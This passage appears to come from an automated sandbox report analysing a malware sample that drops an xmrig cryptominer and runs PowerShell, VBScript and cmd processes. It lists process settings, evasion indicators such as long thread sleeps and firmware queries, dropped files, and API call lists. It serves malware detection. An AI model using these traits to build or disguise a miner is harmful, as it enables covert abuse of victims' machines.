Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Drivers\xmrig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\ProgramData\Drivers\xmrig.exe System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 554
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3789
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6076
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 2617
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4573
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2810
Source: C:\ProgramData\Drivers\xmrig.exe Window / User API: threadDelayed 9942
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3597
Source: C:\Users\user\AppData\Roaming\1.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Roaming\6.exe Dropped PE file which has not been started: C:\ProgramData\Drivers\WinRing0x64.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\2.exe
Source: C:\Users\user\AppData\Roaming\1.exe API coverage: 6.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692 Thread sleep count: 3789 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2780 Thread sleep count: 6076 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3528 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3664 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960 Thread sleep count: 4573 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960 Thread sleep count: 2810 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4620 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5204 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Drivers\xmrig.exe TID: 5176 Thread sleep count: 9942 > 30
Source: C:\ProgramData\Drivers\xmrig.exe TID: 1856 Thread sleep count: 37 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660 Thread sleep count: 3220 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660 Thread sleep count: 3597 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6920 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4056 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4156 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332A40CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332BADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332BADF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332CF900 FindFirstFileExA, 0_2_00007FF7332CF900
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C572ADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 6_2_00007FF6C572ADF0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57140CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 6_2_00007FF6C57140CC
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C573F900 FindFirstFileExA, 6_2_00007FF6C573F900
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FA438 FindClose,abort,FindFirstFileExW,GetLastError, 27_2_00007FF7033FA438
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FA4AC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 27_2_00007FF7033FA4AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2CADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 31_2_00007FF75C2CADF0
